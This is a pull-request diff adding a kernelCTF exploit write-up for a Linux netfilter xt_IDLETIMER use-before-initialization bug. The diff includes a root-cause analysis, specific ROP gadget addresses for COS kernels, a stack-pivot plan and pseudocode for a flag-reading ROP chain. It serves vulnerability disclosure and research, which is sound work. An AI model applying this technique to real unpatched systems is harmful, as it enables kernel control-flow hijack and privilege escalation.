Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
298 changes: 298 additions & 0 deletions pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,298 @@
# **Vulnerability**

## Summary
In `net/netfilter/xt_IDLETIMER.c`, when a label is first created by revision 1 with XT_IDLETIMER_ALARM enabled and is later reused from revision 0, the kernel can invoke mod_timer() on uninitialized memory. This results in a Use-Before-Initialization condition and can subsequently lead to control-flow hijacking if the uninitialized memory is attacker-controlled.

Specifically, rev0 `idletimer_tg_checkentry()` reuses an existing object by label and unconditionally does `mod_timer(&info->timer->timer, ...)`. rev1 can create an object with `timer_type` = `XT_IDLETIMER_ALARM`. In that case `idletimer_tg_create_v1()` initializes the alarm backend and never calls `timer_setup()` for info->timer->timer. So if a rev1 ALARM rule is created first and a rev0 rule later reuses the same label, rev0 touches a struct timer_list that was never initialized.

## **Vulnerability Analysis**
This bug was introduced in Linux kernel v5.7-rc1. When commit 68983a354a65 ("netfilter: xtables: Add snapshot of hardidletimer target") introduces rev1 `idletimer_tg_checkentry_v1()`, it also adds the type confusion check in `idletimer_tg_checkentry_v1()`.

```c
if (info->timer->timer_type != info->timer_type) {
pr_debug("Adding/Replacing rule with same label and different timer type is not allowed\n");
mutex_unlock(&list_mutex);
return -EINVAL;
}
```

However, it forgot to also check type confusion in rev0 `idletimer_tg_checkentry()`. So this bug can be triggered by first creating a rev1 ALARM rule and then creating a rev0 rule with the same label, but **not** the other way around.


And in the newly added `idletimer_tg_create_v1()`, if `timer_type & XT_IDLETIMER_ALARM`, the function will only call `alarm_init()` and `alarm_start_relative()` but will **not** do `timer_setup()` for `info->timer->timer`:

```c
if (info->timer->timer_type & XT_IDLETIMER_ALARM) {
ktime_t tout;
alarm_init(&info->timer->alarm, ALARM_BOOTTIME,
idletimer_tg_alarmproc);
info->timer->alarm.data = info->timer;
tout = ktime_set(info->timeout, 0);
alarm_start_relative(&info->timer->alarm, tout);
} else {
timer_setup(&info->timer->timer, idletimer_tg_expired, 0); // leaves timer uninitialized if timer_type is ALARM
mod_timer(&info->timer->timer,
msecs_to_jiffies(info->timeout * 1000) + jiffies);
}
```

Later in rev0's `idletimer_tg_checkentry()` which does not have the type check, as `__idletimer_tg_find_by_label()` uses the same global `idletimer_tg_list`, it can fetch the timer created from rev1 and then unconditionally call `mod_timer(&info->timer->timer, ...)`, thus triggering the Use-Before-Initialization bug.
```c
info->timer = __idletimer_tg_find_by_label(info->label);
if (info->timer) {
info->timer->refcnt++;
mod_timer(&info->timer->timer,
msecs_to_jiffies(info->timeout * 1000) + jiffies); // UBI to CFH
pr_debug("increased refcnt of timer %s to %u\n",
info->label, info->timer->refcnt);
}
```

The bug was patched in v7.0-rc4 by our team after kctf submission.

# Exploit

## Exploit Summary
- **Prefetch** → Kernel base address leak
- **CVE-2026-23274** → UBI in `mod_timer()`; leaving a payload in kmalloc-256 escalates this to CFH directly
- **NPerm** → Place fake stack for ROP chain
- **ROP** → After CFH, pivot to the stack and execute ROP *in softirq* to read the flag directly.

## Exploit Details

### From UBI to CFH
Since the `mod_timer()` is called with `(idletimer_tg) info->timer->timer` uninitialized, and the uninitialized `idletimer_tg` is allocated by `kmalloc(sizeof(*info->timer), GFP_KERNEL)`, we can control the content of the uninitialized `timer_list timer` by controlling the content of a freed `kmalloc-256` chunk.

In rev1, the `alarm` field in `struct idletimer_tg` is initialized but not the `timer` field.

Then, the independent `timer_list timer` will be used by `mod_timer()`. It contains the callback function pointer `function`:
```c
struct idletimer_tg {
struct list_head entry;
struct alarm alarm;
struct timer_list timer;
struct work_struct work;

struct kobject *kobj;
struct device_attribute attr;

unsigned int refcnt;
u8 timer_type;
};

struct timer_list {
struct hlist_node entry;
unsigned long expires;
void (*function)(struct timer_list *);
u32 flags;
};
```

In `__mod_timer()`

```c
int mod_timer(struct timer_list *timer, unsigned long expires)
{
return __mod_timer(timer, expires, 0);
}

static inline int
__mod_timer(struct timer_list *timer, unsigned long expires, unsigned int options)
{
unsigned int idx = UINT_MAX;
...
debug_assert_init(timer);
if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) {
... // We avoid this branch by controlling entry.pprev so timer_pending(timer) returns false.
} else {
base = lock_timer_base(timer, &flags); // Set timer->flags to 0 to avoid an infinite loop here.
if (!timer->function)
goto out_unlock;
forward_timer_base(base);
}
...
debug_timer_activate(timer);
timer->expires = expires;
if (idx != UINT_MAX && clk == base->clk) // Not taken
enqueue_timer(base, timer, idx, bucket_expiry);
else
internal_add_timer(base, timer); // Will give us CFH later by setting timer->function
out_unlock:
raw_spin_unlock_irqrestore(&base->lock, flags);
return ret;
}
```

To pass the `timer_pending()` check, we simply need to set `entry.pprev` to 0:
```c
struct hlist_node {
struct hlist_node *next, **pprev;
};
static inline int timer_pending(const struct timer_list * timer)
{
return !hlist_unhashed_lockless(&timer->entry);
}
static inline int hlist_unhashed_lockless(const struct hlist_node *h)
{
return !READ_ONCE(h->pprev);
}
```

And also set `timer->flags` to 0 to avoid an infinite loop in `lock_timer_base()`:
```c
static struct timer_base *lock_timer_base(struct timer_list *timer,
unsigned long *flags)
__acquires(timer->base->lock)
{
for (;;) {
struct timer_base *base;
u32 tf;
tf = READ_ONCE(timer->flags);

if (!(tf & TIMER_MIGRATING)) { // must enter this branch to avoid an infinite loop
base = get_timer_base(tf);
raw_spin_lock_irqsave(&base->lock, *flags);
if (timer->flags == tf)
return base;
raw_spin_unlock_irqrestore(&base->lock, *flags);
}
cpu_relax();
}
}
```
And then after 1 second, our evil `timer_list` will be executed in softirq context and we can get a `arb_function(EVIL_TIMER_LIST)`.

### Stack Pivot after CFH
> We have discussed why not using Ret2BPFJIT in the "Additional Notes" section.

Since the UBI `timer_list` will be rewritten in `__mod_timer()`, we can only directly control the `function` pointer but not the arguments.

At the time, `RDI` and `R13` are pointing to the overwritten `timer_list`, which is a part of `idletimer_tg` in kmalloc-256. So if we can spray some bytes with `user_keypayload` in the adjacent chunk, we can control roughly `{RDI, R13}:[0x90-0x170]` (or the negative offset) as our payload.

> (We failed to use builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]); in libxdk, so we turned to our own gadgets)

So we used the following gadgets, which exist in both `cos-113-18244.582.2` and `cos-113-18244.582.40`.

The first-stage gadget will control `RDI` and `RIP` at the same time. To store the fake stack frame, we use `NPerm` from @kylebot and @n132 in CVE-2025-38477 to place the new stack at a certain address.

As we will do an extremely long ROP, even though the `cpu_entry_area` is not randomized before Linux 6.2, we still need to use NPerm to fake a larger stack frame.

Then the second gadget will control `RDX` and `RIP` at the same time, and also set `RBX` to a valid address so the final stack pivot gadget won't crash.
At this point, `RDX` == `RDI` == address of the `NPerm` fake stack frame.

Finally the third gadget controls `RSP` from `RDX` and begins our ROP execution.
```c
// --- initial stack pivot gadgets ---
// In short, the stack pivot is:
// 1. control PC, the rdi/r13 + 0x90 is a controllable user_keypayload range.
// 2. control PC and rdx, the rbx = rdi is a controllable nperm range.
// 3. control PC and rsp = rdx, we can now start ROP. Writing to [rbx] will not crash.

size_t timer_stage1_callback = 0xffffffff81313849;
// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax;
// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?
// This is the first CFH; we use timer_stage1_callback to control rdi and rip at the same time
// rdi and rip are fetched from the next slot, currently we use user_keypayload to place pointer there


size_t nperm_stage1_dispatch = 0xffffffff810643b9;
// nperm_stage1_dispatch:
// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a];
// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax;
// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax;
// This is mainly for controlling rdx and rip (we will do a stack pivot using rdx in the next gadget).
// This also sets rbx to a valid address so the stack pivoting gadget won't crash.

size_t nperm_stack_pivot = 0xffffffff81db2b0f;
// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret;
// This is the final stack pivot
```

### ROP to read the flag
> We have discussed why not using core_pattern in the "Additional Notes" section.

There are several issues we need to solve as we are now ROPing in softirq context; as a result, we decided not to address any of them and just use a long ROP to do anything we want. As `NPerm` allows us to place a maximum of **512*8** bytes of payload.

Then we did the following things in our ROP to directly read the flag and print it in kernel log:

- Prepare a fake work_struct in a stable writable kernel region. This object will be loaded by `rpc_prepare_task+5` as a second controlled object and transfers control into a second pivot sequence. With this we can leave the timer softirq path as early as possible and move the final logic into process context.

- We use another controlled (with arb write in ROP to some kernel rw address) region that holds both pivot metadata and the final ROP stack. The metadata provides the pop rsp target used by the indirect branch from the fake work item. The stack then writes /flag, a printk format string visible to a low-level attacker, a read position, and a read buffer into writable kernel memory. With those arguments in place, the chain performs filp_open, kernel_read, and finally _printk to emit the flag. **We did NOT use arb write to set `dmesg_restrict` to 0, but since we are doing ROP we can easily add that if needed.**

- The exploit therefore queues the fake work item onto CPU0 and stops the current CPU. Then the queued kworker can run the open-read-printk sequence from process context.

The queueing step is necessary because direct VFS activity from timer softirq context is fragile.

Here is the **equivalent** of our ROP chain in C-like pseudocode:
```c
struct fake_work_item {
struct work_struct work;
struct fake_rpc_dispatch {
void *stage2_base;
void *dispatch_target_slot;
} dispatch;
};

struct flag_read_context {
char path[16];
char fmt[16];
loff_t pos;
char buf[0x80];
};

static void stage2_behavior(struct flag_read_context *ctx) {
struct file *fp;
fp = filp_open(ctx->path, O_NOATIME, 0);
kernel_read(fp, ctx->buf, sizeof(ctx->buf), &ctx->pos);
_printk(ctx->fmt, ctx->buf);
for (;;)
cpu_relax();
}

static void semantic_rop_behavior(void *work_base, void *pivot_base) {
struct flag_read_context *ctx = pivot_base + 0x98;
// prepare stage2 context
strcpy(ctx->path, "/flag");
strcpy(ctx->fmt, "\001%s\n"); // make it readable to a very low-level attacker
ctx->pos = 0;
memset(ctx->buf, 0, sizeof(ctx->buf));

// stage1 behavior, prepare fake work
struct fake_work_item *item = work_base; // any rw kernel address
item->work.data = WORK_STRUCT_PENDING_BITS;
item->work.entry.next = &item->work.entry;
item->work.entry.prev = &item->work.entry;
item->work.func = (work_func_t)rpc_prepare_task_plus_5;
item->dispatch.stage2_base = pivot_base;
item->dispatch.dispatch_target_slot = &((char *)pivot_base)[0x66];
*(void **)item->dispatch.dispatch_target_slot = pop_rsp_pop_r13_ret;

queue_work_on(0, system_wq, &item->work);
stop_this_cpu();
// The real exploit forges enough metadata so that rpc_prepare_task+5 pivots into a stack whose
// effect is equivalent to calling stage2_behavior(ctx) from kworker process context.
}
```

The full ROP can be found in the `exploit.c` file.

Overall, the ROP plan is: use the timer corruption to reach NPerm-backed stack control, use that control to build and queue fake work, and let the queued kworker execute the final file-read-and-print sequence in process context.

## Additional Notes

### Why not use Ret2BPFJIT
As we know, even after cBPF JIT was hardened by default (`bpf_jit_harden` is enabled) in kctf now, attackers can still spray a "kernel one gadget" with unpoisoned instructions and gain root, like [CVE-2025-21700 exploit](https://github.com/google/security-research/blob/bc107b0437c09e3b430948a60ab29f65338e4fff/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md).

However, their 100% success rate solution seems to rely on certain registers pointing to a valid address (as a side effect of their nop sled).
But those register constraints are not satisfied in our case, and we did not try to remove or find another alternative nop sled to enhance their solution. So currently the "kernel one gadget" approach is not working for us.

### Why use ROP to read the flag
As our corrupted `timer_list` was called in softirq context, we cannot use normal *COMMIT_CREDS_RETURN_USER* ROP to gain a root shell, nor use tricks like *[telefork](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/)*.

For the common LPE and container escape from `core_pattern`, we also did not successfully trigger the usermode helper because:
- When we are doing the stack pivot, we overwrite some callee-saved registers, which will be used if we want to return from softirq properly (mainly for unlocking and some other purposes). So we just naively halt the core by doing `msleep` in softirq context because we have 2 cores to waste.
- The core dump will queue the umh if `core_pattern[0]` == `|`, and then wait the dumped process group to exit. So it will always queue the actual `call_usermodehelper(OUR_LPE_PAYLOAD)` request instead of directly execute it.
- In our case, the queued request always went to the halted core. As a result, we can see our payload keeps being queued but never executed.

Thus, we moved to manually queue a readflag work for another core before we halt the first core.
And it turns out that this is a relatively long ROP (found by ropbot), while several gadgets are not generatable by the current libxdk.
13 changes: 13 additions & 0 deletions pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
# Vulnerability Details

- **Requirements**:
- **Capabilities**: `CAP_NET_ADMIN`
- **Kernel configuration**: `CONFIG_NETFILTER=y, CONFIG_NETFILTER_XTABLES=y, CONFIG_NETFILTER_XT_TARGET_IDLETIMER=y, CONFIG_IP_NF_IPTABLES=y`
- **User namespaces required**: Yes
- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=68983a354a655c35d3fb204489d383a2a051fda7
- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf
- **Affected Version**: `v5.7-rc1 - v7.0-rc3`
- **Affected Component**: `net/netfilter: xt_IDLETIMER`
- **Syscall to disable**: `unshare`
- **Cause**: Use-Before-Initialization
- **Description**: A Use-Before-Initialization vulnerability was discovered in the Linux kernel's netfilter subsystem. When a label was created first by revision 1 with XT_IDLETIMER_ALARM and then reused from revision 0 can causes mod_timer() on an uninitialized memory, leading to a Use-Before-Initialization vulnerability.
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
CC := g++
CPPFLAGS := -Ikernel-research/libxdk/include
CFLAGS := -static
LDFLAGS := -Lkernel-research/libxdk/lib
LDLIBS := -lkernelXDK

TARGETS := exploit exploit_debug
SRC := exploit.c

.PHONY: all prerequisites run clean

all: prerequisites exploit

prerequisites: target_db.kxdb kernel-research/libxdk/lib/libkernelXDK.a

target_db.kxdb:
wget -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb

kernel-research:
git clone --depth 1 https://github.com/google/kernel-research.git $@

kernel-research/libxdk/lib/libkernelXDK.a: | kernel-research
cd kernel-research/libxdk && ./build.sh

exploit: $(SRC)
$(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS)

exploit_debug: CFLAGS += -g
exploit_debug: $(SRC)
$(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS)

run: exploit
./$<

clean:
rm -rf $(TARGETS) target_db.kxdb kernel-research
Binary file not shown.
Loading
Loading